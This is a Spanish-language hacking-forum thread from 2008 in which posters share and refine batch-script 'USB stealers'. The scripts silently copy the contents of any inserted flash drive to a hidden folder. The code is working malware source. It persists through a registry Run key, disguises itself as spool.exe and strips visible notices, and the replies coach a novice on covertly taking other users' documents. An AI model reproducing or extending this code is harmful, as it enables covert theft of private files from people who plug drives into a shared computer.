Foro de elhacker.net

Programaciˇn => Scripting => Mensaje iniciado por: corax en 1 Octubre 2008, 18:26 pm



Título: My USB Stealer
Publicado por: corax en 1 Octubre 2008, 18:26 pm
Hola a todos!

Hoy os traigo la plantilla de un cˇdigo en batch cuya funciˇn es copiar el contenido de memorias externas a una carpeta del disco duro de manera automßtica.

La plantilla es:
Código
  1. ::Code pensado para detectar y copiar todo el contenido de un USB conectado al equipo.
  2. :: Construido en arquitectura on-demand (hay que ejecutar el programa para que realice la orden).
  3. :: Este sistema copia todos los archivos. Es posible adaptar el code para que copie solo archivos con un nombre y/o una extensiˇn concreta.
  4.  
  5. @echo off
  6. If Exist C:\STOLEN (goto echeck) else (
  7. MD C:\STOLEN
  8. goto echeck
  9. )
  10.  
  11. :echeck
  12. ping -n 30 localhost
  13. if exist E:\ (goto existe) else (goto fcheck)
  14.  
  15. :fcheck
  16. ping -n 2 localhost
  17. if exist F:\ (goto existf) else (goto gcheck)
  18.  
  19. :gcheck
  20. ping -n 2 localhost
  21. if exist G:\ (goto existg) else (goto hcheck)
  22.  
  23. :hcheck
  24. ping -n 2 localhost
  25. if exist H:\ (goto existh) else (goto echeck)
  26.  
  27.  
  28. :existe
  29. ping -n 2 localhost
  30. xcopy E:\*.* C:\STOLEN\*.* /E /I
  31. (goto fcheck)
  32.  
  33.  
  34. :existf
  35. ping -n 2 localhost
  36. xcopy F:\*.* C:\STOLEN\*.* /E /I
  37. (goto gcheck)
  38.  
  39.  
  40. :existg
  41. xcopy G:\*.* C:\STOLEN\*.* /E /I
  42. ping -n 2 localhost
  43. (goto hcheck)
  44.  
  45.  
  46. :existh
  47. xcopy H:\*.* C:\STOLEN\*.* /E /I
  48. ping -n 2 localhost
  49. (goto echeck)
  50.  

Como podemos ver el cˇdigo es bastante tosco. Esto es asÝ porque estß pensado para usarse como modelo de partida para otros cˇdigos mßs especÝficos.
Por ejemplo, imaginemos que queremos que el programa copie un tipo de archivos concretos a una carpeta menos llamativa que C:\STOLEN, y que ademßs queremos que lo haga siempre, sin necesidad de que nosotros ejecutemos el programa.
Pues partiendo del cˇdigo anterior, con unas peque˝as modificaciones obtenemos un cˇdigo como este:

Código
  1. ::Code pensado para detectar y copiar todo el contenido de un USB conectado al equipo.
  2. :: Construido en arquitectura always-on (una vez instalado, se ejecuta siempre).
  3. :: El tipo de archivos que va a copiar son JPG y BMP. Esto es configurable.
  4.  
  5. @echo off
  6.  
  7. If Exist "%PROGRAMFILES%\USB\spool.exe" (goto alpha) else (goto betha)
  8.  
  9. :betha
  10. MD "%PROGRAMFILES%\USB\"
  11. copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
  12. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
  13. goto alpha
  14.  
  15. :alpha
  16. If Exist "%USERPROFILE%\USB\" (goto echeck) else (
  17. MD "%USERPROFILE%\USB\"
  18. goto echeck
  19. )
  20.  
  21. :echeck
  22. ping -n 30 localhost
  23. if exist E:\ (goto existe) else (goto fcheck)
  24.  
  25. :fcheck
  26. ping -n 2 localhost
  27. if exist F:\ (goto existf) else (goto gcheck)
  28.  
  29. :gcheck
  30. ping -n 2 localhost
  31. if exist G:\ (goto existg) else (goto hcheck)
  32.  
  33. :hcheck
  34. ping -n 2 localhost
  35. if exist H:\ (goto existh) else (goto echeck)
  36.  
  37.  
  38. :existe
  39. ping -n 2 localhost
  40. xcopy E:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
  41. xcopy E:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
  42. (goto fcheck)
  43.  
  44.  
  45. :existf
  46. ping -n 2 localhost
  47. xcopy F:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
  48. xcopy F:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
  49. (goto gcheck)
  50.  
  51.  
  52. :existg
  53. xcopy G:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
  54. xcopy G:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
  55. ping -n 2 localhost
  56. (goto hcheck)
  57.  
  58.  
  59. :existh
  60. xcopy H:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
  61. xcopy H:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
  62. ping -n 2 localhost
  63. (goto echeck)
  64.  

AquÝ vemos que el programa se copiarÝa a la carpeta de Archivos de Programa, y crearÝa una clave en el registro que lo auto-iniciarÝa con windows, para evitar tener que andarlo ejecutando continuamente.
Ademßs, los datos se copian a la carpeta %USERPROFILE%\USB\, que llama menos la atenciˇn que C:\STOLEN, obviamente  ::)

NOTA IMPORTANTE: Para que el programa funcione, es necesario compilarlo a .exe y dotarlo de la caracterÝsitca de ejecutarse en modo oculto.

Espero que este cˇdigo os sea de utilidad a los que buscßbais algo parecido (yo en su momento lo busquÚ), ya que asÝ por lo menos no os arriesgßis a que el programa que os descargßis traiga "regalito". (Ventajas de conocer el cˇdigo fuente  :rolleyes:)

Hasta otra!


Título: Re: My USB Stealer
Publicado por: SmartGenius en 3 Octubre 2008, 05:25 am
Necesitas ayuda con codigos.....ya tengo la idea bastante desarrollada hace rato...y ya ahi una version funcional...programada con ayuda del compa˝ero Rockox...

(http://img177.imageshack.us/img177/936/splashusbstealer2rr4.th.jpg)
(http://img379.imageshack.us/img379/9263/splashusbstealerig6.jpg)

Mira...lo puedes descargar aqui...

http://two.xthost.info/smartgenius/SourceCodeUSBStealerV1.01.zip
http://rapidshare.com/files/122880149/USBPendriveStealerv1.01.zip

El programa consta de dos codes...uno de configuracion y uno de escaneo...

USBStealer
Código:
@echo off
mode con cols=70
mode con lines=40
title Pendrive Stealer - Local
color 0a
REM Script de Copia de Dispositivos USB
REM Coded by :: SmartGenius :: , RockoX

if exist "myfolder.cfg" (goto anim) else (goto ins)

:ins
cls
echo.
echo  Instalando el Programa...
echo  Por favor espere
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
md "Mi Carpeta"
echo "Mi Carpeta\">"myfolder.cfg"
ping -n 2 0.0.0.0 > nul
pause
goto anim

:anim
cls
echo.
echo        ▒▒▒▒▒                                               ▒▒▒▒▒
echo      ▒▒░░░░░▒                                            ▒▒░░░░░▒
echo      ▒░░░░░░░▒▒                                         ▒░░░░░░░▒
echo    ▒▒░░░░░░░░░▒                                        ▒▒░░░░░░░░▒▒
echo   ▒░░░░░░░░░░░▒                                      ▒▒░░░░░░░░░░░░▒
echo   ▒░░░░░░░░░░░░▒▒            ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓   ▒▒▒░░░░░░░░░░░░░░▒
echo    ▒▒░░░░░░░░░░░░▒▒▒     ▓▓▓▓▒▒░░░░░░░░░░░░▒▒▓▓▓▓▒░░░░░░░░░░░░▒▒▒▒▒
echo      ▒▒▒▒▒▒░░░░░░░░░▒▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░▓▓▓▓░░░░░░▒▒▒▒▒
echo            ▒▒▒░░░░░▓▓▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓▓▓░░▒▒
echo               ▒░░▓▓▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓▓▒
echo                 ▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒▓▓
echo                ▓▓░░░░░░░░░░▓▓▓▓░░░░░░░░▓▓▓▓░░░░░░░░░░░▓▓
echo                ▓▓░░░░░░░░▓▓▓▓▓▓▓▓░░░░▓▓▓▓▓▓▓▓░░░░░░░░░▓▓
echo                ▓▓░░░░░░░░▓▓▓▓▓▓▓▓░░░░▓▓▓▓▓▓▓▓░░░░░░░░░▓▓
echo                ▓▓░░░░░░░░░▒▓▓▓▓░░░░░░░▒▓▓▓▓░░░░░░░░░░░▓▓
echo                ▓▓▒▒░░░░░░░░░░░░░░▒▒▒▒░░░░░░░░░░░░░░░░▓▓
echo                 ▓▓▓░░░░░░░░░░░░░░▓▓▓▓░░░░░░░░░░░░░░▓▓▓▓
echo                ▒▒▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓▓▓░░▒▒
echo               ▒▒░░░░▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓░░░░░░▒▒
echo            ▒▒▒░░░░░░░▓▓▓▓░░░░░░░░░░░░░░░░░░░░░▓▓▓░░░░░░░░░░▒▒▒▒▒▒▒
echo      ▒▒▒▒▒▒░░░░░░░░▒▒▓  ▓▓▓░░░░░░░░░░░░░░░░░░▓▓  ▒▒░░░░░░░░░░░░░░░▒▒
echo    ▒▒░░░░░░░░░░░░▒▒       ▓░░░░░░░░░░░░░░░░░░▓     ▒▒▒▒░░░░░░░░░░░░░▒
echo    ▒░░░░░░░░░░░▒▒         ▓░░░░░░░░░░░░░░░░░░▓         ▒▒░░░░░░░░░░▒▒
echo    ▒▒░░░░░░░░▒▒           ▓░░▒░░▒░░▒░░▒░░▒░░░▓          ▒░░░░░░░░▒▒
echo      ▒▒░░░░░▒▒            ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓          ▒▒░░░░░░▒
echo        ▒░░░▒▒                                             ▒░░░░▒
echo         ▒▒▒▒                                               ▒▒▒▒
echo.
echo              ▓▓▓ ▓▓▓ ▓▓  ▓▓▓    ▓▓ ▓▓ ▓▓▓ ▓ ▓ ▓▓▓ ▓▓▓  ▓▓▓
echo              ▓   ▓ ▓ ▓ ▓ ▓      ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓   ▓  ▓ ▓
echo              ▓   ▓ ▓ ▓ ▓ ▓▓▓ ▓▓ ▓   ▓ ▓▓▓ ▓▓  ▓▓▓ ▓▓▓  ▓▓▓
echo              ▓   ▓ ▓ ▓ ▓ ▓      ▓   ▓ ▓ ▓ ▓ ▓ ▓   ▓  ▓   ▓
echo              ▓▓▓ ▓▓▓ ▓▓  ▓▓▓    ▓   ▓ ▓ ▓ ▓ ▓ ▓▓▓ ▓  ▓ ▓▓▓
echo.
pause
goto main

:main
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo    Elija una Opcion:
echo.
echo   ┌─┐ ┌─────────────────────────────┐  ┌─┐ ┌──────────────────────┐
echo   │1│ │ Definir carpeta principal...│  │2│ │ Tipos de Archivos..  │
echo   └─┘ └─────────────────────────────┘  └─┘ └──────────────────────┘
echo   ┌─┐ ┌─────────────────────────────┐  ┌─┐ ┌──────────────────────┐
echo   │3│ │ Iniciar Escaneo de USBs...  │  │4│ │ Ayuda del Programa.. │
echo   └─┘ └─────────────────────────────┘  └─┘ └──────────────────────┘
echo   ┌─┐ ┌─────────────────────────────┐
echo   │5│ │ Salir del Programa..        │
echo   └─┘ └─────────────────────────────┘
echo.
set /p opc=">> "
if "opc"=="" (goto main)
set opc=%opc: =_%

if %opc%==1 goto dcp
if %opc%==2 goto ftype
if %opc%==3 goto scan
if %opc%==4 goto help
if %opc%==5 (goto out) else (goto err)

:err
cls
echo.
echo ERROR...
echo.
echo No ha escogido una Opcion Correcta
echo Vuelva a Intentarlo
echo.
pause
goto main

:dcp
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo   En esta opcion puede definir en donde se guardaran
echo   los archivos copiados...
echo.
echo  Arrastre aqui la carpeta
echo.
set /p dcp=">> "
if "dcp"=="" (goto dcp)
echo %dcp%>"myfolder.cfg"
echo.
echo  La carpeta : %dcp%
echo  se ha establecido exitosamente...
echo.
pause
goto main

:ftype
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo   Configure aqui los tipos de archivos que desea Escanear y Copiar
echo.
echo    Elija una Opcion:
echo.
echo   ┌─┐ ┌────────────────┐  ┌─┐ ┌──────────────────────────┐
echo   │1│ │ Documentos...  │  │2│ │ Imagenes ^& Fotos..       │
echo   └─┘ └────────────────┘  └─┘ └──────────────────────────┘
echo   ┌─┐ ┌────────────────┐  ┌─┐ ┌──────────────────────────┐
echo   │3│ │ Musica ^& Audio │  │4│ │ Documentos ^& Imagenes..  │
echo   └─┘ └────────────────┘  └─┘ └──────────────────────────┘
echo   ┌─┐ ┌────────────────┐  ┌─┐ ┌──────────────────────────┐
echo   │5│ │ Videos *       │  │6│ │ Todas las Opciones... *  │
echo   └─┘ └────────────────┘  └─┘ └──────────────────────────┘
echo.
echo  * Las Opciones 5 y 6 pueden tardar mas de lo normal...
echo.
set /p typ=">> "
if "typ"=="" (goto ftype)
if %typ%==1 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb>"ftypes.cfg" & goto yap)
if %typ%==2 (echo *.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==3 (echo *.mp3,*.mp4,*.wav,*.mid,*.wma,*.ogg>"ftypes.cfg" & goto yap)
if %typ%==4 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb,*.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==5 (echo *.mpg,*.wmv,*.asf,*.3gp,*.avi,*.mov>"ftypes.cfg" & goto yap)
if %typ%==6 (echo *.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm,*.jpg,*.gif,*.bmp,*.png,*.mp3,*.mp4,*.wma>"ftypes.cfg" & goto yap)
goto main

:yap
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
echo.
echo  Tipos de Archivos Configurados correctamente
echo.
echo  Archivos con Extension: %filetypes%
echo.
pause
goto main

:scan
start USBScan.bat
exit

:help
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo  Este programa tiene la Funcion de copiar archvos desde dispositivos
echo  USB, de manera silenciosa y sin levantar sospechas...
echo.
echo  El programa puede ser congifurado facilmente, dandole opciones de
echo  escoger que tipos de archivos copiar y en que carpeta se deben
echo  guardar...
echo.
echo.
echo  Titulo:  Pendrive USB Stealer, Version 1.0 Local
echo  Autores: :: SmartGenius ::, RockoX
echo  Web:     http://foro.code-makers.es
echo.
echo  SmartGenius, Corp. 2008
echo.
pause
goto main
 
:out
cls
echo MsgBox "Gracias por usar este Programa", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

USBScan
Código:
@echo off
title USB Stealer - Local
color 0a

:load
cls
echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto ini

:ini
if not exist "myfolder.cfg" (goto fixfolder)
for /F "tokens=*" %%a in (myfolder.cfg) do set myfolder=%%a
if not exist "ftypes.cfg" (gotp fixfiles)
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
goto main

:main
for %%u in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do call :comp %%u
goto ini

:comp
set unidad=%1
FSUTIL FSINFO DRIVETYPE %unidad%:>%temp%\letuni.tmf
if %errorlevel%==1 (goto usb2)
for /F "tokens=*" %%e in (%temp%\letuni.tmf) do set let=%%e
if %let:~-4%==ble (call :usb %unidad%)
if %let:~-4%==ija (goto :eof)
if %let:~-4%==ROM (goto :eof)

:usb
set letra=%1
if exist "%letra%:\db.ini" goto :eof
for  /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
echo USB>db.ini
goto :eof

:usb2
for %%n in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do (call :usb %%n)
goto ini

:fixfiles
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
echo MsgBox "Los Tipos de Archivo no estan configurados...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

:fixfolder
echo "Mi Carpeta\">"myfolder.cfg"
echo MsgBox "No Hay una Carpeta Predefinida...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

Saludos.


Título: Re: My USB Stealer
Publicado por: corax en 3 Octubre 2008, 13:03 pm
No estß mal, no estß mal, es muy bueno el code que sugieres...  ;D la idea general que yo proponÝa es que fuera simple, lo bßsico, cuatro cosas y ya estß, e ir configurßndolo seg˙n las necesidades cambiando el cˇdigo fuente... vosotros lo que habÚis hecho es currßroslo un montˇn.

Gracias por el aporte, voy a probar vuestro cˇdigo cuando tenga un momento.  :P


Un saludo  ;)


Título: Re: My USB Stealer
Publicado por: estudcom en 23 Octubre 2008, 12:50 pm
Hola corex
me encanta lo que has creado pero necesito tu ayuda. He creado un post aquÝ exponiendo mi caso:
http://foro.elhacker.net/hacking_basico/usb_copiador_o_algo_asi_ayuda-t231480.0.html

En cualquier caso te explico. Lo que quiero es un programa muy sencillo que copie la informaciˇn de un pen drive (word, pdf, pps,) en una carpeta del ordenador. Tu codigo por lo que veo hace exactamente eso pero en mi caso tengo un problema y es que necesito que el codigo se autoejecute Úl sˇlo con windows (al iniciar windows) y se mantenga activo todo el tiempo, es decir, que cada vez que alguien inicie sesion y meta un pen drive automaticamente y en silencio se copie todo el contenido en una carpeta y si en la misma sesion otra persona mete otro pen drive tambiÚn copie su contenido (y bueno que si alguien cierra la sesion y otro abre una nueva y mete su pen drive se copie tambien todo). Sˇlo que todo esto lo tiene que hacer sin necesidad de que yo lo active o ejecute (tiene que ser completamente automßtico).

Si vas al post donde explique mi situaciˇn veras que averno me ha ayudado mucho pero que la mayorÝa de las soluciones que me ha dado han tenido sus inconvenientes y en general que yo no se mucho de informatica ni de programar ni nada.
Muchisimas gracias con lo que me puedas ayudar y espero impaciente tu ayuda.


Título: Re: My USB Stealer
Publicado por: SmartGenius en 24 Octubre 2008, 04:01 am
El code que he posteado arriba esta mejor trabajado...tra ya las opcines listas, solo es cuestin de ejecutarlo y ponerlo a escanear..se hace de manera oculta, para lo toro que quieres lo que debes hacer es agregar el scanner al inicio de windows y el solo estara todo el tiempo haciendo su trabajo...

El code expuesto es libre de ser modificado, pero manteniendo los autores originales....yo en lo personal me he encargado de hacerle una nueva interfaz y de mejorar el scanner para hacerlo mas efectivo....

(http://img236.imageshack.us/img236/2261/splashmf4.png)

http://rapidshare.com/files/154932419/USBStealerbySmart.rar

Con la Interfaz programas las opciones y luego haces que el scanner se ejecute con cada inicio de WINDOWS....

Saludos.


Título: Re: My USB Stealer
Publicado por: corax en 24 Octubre 2008, 10:11 am
Fascinante... un trabajo realmente fino.

Enhorabuena.  ::)


Título: Re: My USB Stealer
Publicado por: estudcom en 28 Octubre 2008, 17:53 pm
oye smart genius muchisimas gracias. es justo lo que necesitaba!!. Bueno ya habÝa erdido toda esperanza sobretodo porque no se xq razon ya no puedo acceder al post que cree para conseguir lo que tu me has servido en bandeja.
Esta genial. Lo unico que sˇlo voy ha usar el ejecutable USBScan que por lo que he visto simplemente al ejecutarlo copia todos los pdf word pps incluso excel a la carpeta donde lo pongo (y voy ha hacer lo del acceso directo en la carpeta inicio).
En realidad el otro archivo USBStealer es mucho mejor pero lo malo es que cuando le das a ocultar deja un simbolito abajo a la derecha.
En fin con el USBScan me basta muchas gracias!!!! eres el mejor


Título: Re: My USB Stealer
Publicado por: estudcom en 29 Octubre 2008, 17:34 pm
smart genius tengo un problemilla que no logro entender. hasta ahora todo funcionaba bien pero hoy pasa lo siguiente. Para empezar en la carpeta donde indico que se deben copiar los documentos del pen copia unos archivos muy raros (que no estan en el pen) en plan e-books en ingles y cosas asÝ. No se si puede que recupere informaciˇn ya borrada del pen (no lo entiendo pero es una posibilidad no?) o si esta copiando archivos de otra carpeta del ordenador. En cualquier caso ha dejado de copiar el contenido del pen. Tiene que ver con algo de la unidad? (a veces la unidad es E y otras F). Yo para instalarlo hice lo siguiente:
-Descomprimi.
-Puse todo en una carpeta.
-Ejecute el archivo USBStealer y lo configure (le indique la carpeta donde copiar y elegi documentos). Le di a iniciar para comprobar y todo bien.
-Cerre USBStealer y cree un acceso directo del archivo USBScan el cual introduje en la carpeta de inicio para que se inicie con windows.

Y ya esta. He cometido algun error? no deberÝa iniciarse con windows el usb scan y copiarlo todo sin que se vea que lo hace?.
Gracias


Título: Re: My USB Stealer
Publicado por: SmartGenius en 29 Octubre 2008, 21:45 pm
Bueno...en el paquete vienen dos archivos que son el USBSTealer que no es mas que una interfaz grafica en vb.net...hecha como mejora de la que habia anteriormente que esta en este post mas arriba, y el otro archivo es el USBScan que es casi el mismo codigo que hay arriba...solo modifique la forma de detectarmlas unidades extraibles...y cuando una unidad ya es analizada deja en ella un archivo llamado DB.INI para que o vuelva a copiar de la misma USB...eso fue solo de pruebas...puedes usar el codigo que esta posteado mas arriba, lo pasa a EXE y de seguro tamben funcionara...y claro que debria arrancar con windows...tanto desde la carpeta Inicio com que lo agregues al registro...

La interfaz se hizo de esa manera como para mantener informado al user, hacerla ams amigable y por eso la opcion de ocultarse en el Tray...pero puedes cerrar la aplicacion y aun seguora escaneando a menos que le des en detener...

si tienes mas dudas solo me avisas OK.

Saludos.


Título: Re: My USB Stealer
Publicado por: argon2002 en 31 Octubre 2008, 15:43 pm
Hola SmartGenius, he seguido vuestro hilo porque a mi tambiÚn me interesa la aplicaciˇn que has desarrollado. He seguido todos los pasos que has comentado, he descargado el programa y su interfaz grßfica y he a˝adido el programa al inicio de Windows XP mediante el registro de Windows. Todo funciona perfectamente, el ˙nico problema es que cuando arranco el sistema, aparece una ventana del USBStealer que dice algo asÝ como : "Ha comenzado el escaneo" . Me gustarÝa que esa ventana no apareciera, que el USBStealer se ejecutara al inicio de Windows, pero que no apareciera ning˙n mensaje que indicara que estß funcionando. No se si tienes idea de como hacerlo, imagino que una peque˝a modificaciˇn del cˇdigo del programa podrÝa valer, o a lo mejor tu conoces alguna soluciˇn mßs simple. Un saludo y gracias


Título: Re: My USB Stealer
Publicado por: SmartGenius en 31 Octubre 2008, 23:07 pm
Muy seguramente estan haciendo uso dle codigo que esta mas arriba....y ese tiene una linea de codigo que muestra ese aviso... y pues es para eso..para que avise...

Código:
:load
cls
echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto ini

aunque deberian usar la que postee mas abajo en el cual ya quite esa funcion...simplemente empieza a escanear con base en los dos archivos previamente configurados por la interfaz...y todo lo hace da manera silenciosa....

http://rapidshare.com/files/154932419/USBStealerbySmart.rar

Saludos.


Título: Re: My USB Stealer
Publicado por: estudcom en 18 Noviembre 2008, 20:17 pm
oye no me funciona. Podrias hacerme el favorazo enrome de hacer un programita sencillo que solo copie documentos de Power Point y word de forma oculta y automaticamente. y nisiquiera tiene que ser configurable con que lo copie n la misma carpeta donde ponga el programa bastaria. gracias


Título: Re: My USB Stealer
Publicado por: corax en 19 Noviembre 2008, 14:31 pm
Si lees los cˇdigos que hice yo al principio del post verßs que justamente lo que explican es cˇmo hacÚrtelo t˙ mismo a partir de las plantillas que puse, todo muy casero y muy rudimentario, pero oculto y funcional.

Intenta hacerlo t˙, y si tienes alg˙n problema con los cˇdigos en batch o al compilar me comentas  ;)


Título: Re: My USB Stealer
Publicado por: estudcom en 19 Noviembre 2008, 16:57 pm
corax me acabas de arrojar mucha luz. a veces estamos tan cerca de un problema que perdemos la perspectiva y no podemos ver las opciones. Lo que quiero decir es que voy ha ahcer lo que me has dicho pero tengo algunas dudas (sobretodo porque no se mucho de informßtica). Sˇlo quiero que me digas que es lo que tengo que cambiar para que se inicie con windows y copie todo tipo de archivos en la carpeta c:/z434733/eviews/
Me encantarÝa que me postearas el code modificado para lo que te pido pero por intentarlo te pongo el code como yo lo he modificado (en realidad he mezclado un poco de los dos codigos de arriva para que se inice automaticamente y para que copie todo tipo de archivos), mi mayor problema es que no se que tengo que hacer con el code: ┐lo guardo en un txt con alguna extensiˇn especifica? ┐como se hace eso? y mi ortro problema es que no se que tengo que cambiar para que copie todo en la ruta c:/z434733/eviews/
Gracias por tu ayuda de verdad

Código:
@echo off
 
If Exist "%PROGRAMFILES%\USB\spool.exe" (goto alpha) else (goto betha)
 
:betha
MD "%PROGRAMFILES%\USB\"
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
goto alpha
 
:alpha
If Exist "%USERPROFILE%\USB\" (goto echeck) else (
MD "%USERPROFILE%\USB\"
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\STOLEN\*.* /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.* C:\STOLEN\*.* /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto echeck)

Una ultima cosa he estado probando por cuariosidad (aunque sin saber lo que hago realmente) y he guardado el documento de bloc de notas con la extensiˇn .bat y no se porque no se ha creado ningun .bat, es decir, sigue siendo un archivo de bloc de notas. he probado ha cambiar la extensiˇn a .ini y tampoco sirve. Es como si no pudiera cambiar la extensiˇn de los archivos del bloc de notas. A mi me suena que antes podÝa ┐que ha podido pasar? habre cambiado algo de la configuraciˇn del ordenador sin querer?. Lo digo porque sino puedo crear la extensiˇn que requiera este programa quizas podrias mandarme un alrchivo con esa extensiˇn. En fin estoy aquÝ a la expectartiva e impaciente. Gracias y un saludo


Título: Re: My USB Stealer
Publicado por: corax en 19 Noviembre 2008, 22:34 pm
Hola estudcom,

Hay un par de cosas del code que debes cambiar:

Si quieres copiar los archivos a C:\z434733\eviews\ tienes que cambiar la siguiente parte del cˇdigo:

Cˇdigo original:
xcopy %USBLETTER%:\*.* C:\STOLEN\*.* /E /I (siendo %USBLETTER% la letra de la unidad extraÝble, es decir, E, F, G, H y las que t˙ le quieras meter si creas mßs redirecciones)

Cˇdig%USBLETTER%:\*.* C:\z434733\eviews\*.* /E /I

Es decir, en la segunda ruta especificas la direcciˇn a la que se va a copiar.
(NOTA: Veo que has puesto la direcciˇn de C:\z434733\eviews\ con esta barra: /. En batch la barra que se utiliza para definir las rutas es esta: \ [la barra inversa])

Respecto a que no se te cambian las extensiones de los archivos del bloc de notas: quizß no tengas habilitadas las extensiones en el ordenador en el que trabajas (es decir, en vez de ver el nombre de archivo "Prueba.txt", por poner un ejemplo, veas sÝmplemente "Prueba"). ┐QuÚ pasa en ese caso? Que al ponerle extensiˇn .bat realmente no le estßs dando una nueva extensiˇn, ya que las tienes ocultas, sino que  al archivo "prueba" le estßs dando el nuevo nombre de "prueba.bat", siendo la extensiˇn de ambos la de .txt

Resumiendo, no le estßs cambiando realmente la extensiˇn al archivo, sino que estßs haciendo archivos con nombres como "prueba.bat.txt".
Para corregir eso ve a la pesta˝a "herramientas" en cualquier carpeta, de ahÝ a la opciˇn "opciones de carpeta", y una vez ahÝ selecciona la pesta˝a "ver". Dentro de ella hay un listado de opciones, unas marcadas y otras sin marcar. Cerca del final hay una llamada "Ocultar las extensiones para tipos de archivo conocido". Desmßrcala si estß marcada.

De todas maneras este cˇdigo no estß pensado para renombrar el archivo a .bat y ejecutarlo, ya que la idea es que corra oculto a la vista del usuario.

Si te fijas, en las primeras lÝneas de cˇdigo estß la orden:
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
┐QuÚ significa esto? Que copie el archivo actual (%0), desde la ruta que sea y con el nombre que sea a la carpeta C:\Archivos de Programa\USB\ y con el nombre de archivo de spool.exe
Para que funcione correctamente al copiarse a cualquier sitio con la extensiˇn .exe el archivo tiene que ser un .exe. Si renombramos un .bat a un .exe directamente no corre.

Entonces lo que debes hacer es descargarte un compilador, como por ejemplo el Quick Batch File Compiler (a ser posible una de las ˙ltmas versiones, ya que los archivos compilados por versiones anteriores son detectados por los antivirus aunque en realidad no lo sean). Esto lo puedes encontrar en varios posts de este foro, sobre todo en los manuales de Octalh, o si no buscando un poco en google, que tambiÚn sale.



Por cierto, si quieres darle otro nombre al ejecutable (que no se llame en ˙ltimo tÚrmino spool.exe) debes cambiar el nombre en la rama de:

copy /y %0 "%PROGRAMFILES%\USB\spool.exe"

y en la de:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f

De la misma manera, si quieres copiarlo a otra carpeta, sˇlo cambia las rutas de
%PROGRAMFILES%\USB\
en ambas lÝneas.


Título: Re: My USB Stealer
Publicado por: estudcom en 20 Noviembre 2008, 16:12 pm
guau!!! muchas gracias corax, acabas de mostrarme un mundo nuevo. No sabes el tiempo que he estado buscando como hacer un batch que fuera .exe y la solucion ante mis narices. En fin te cuento mis problemas:
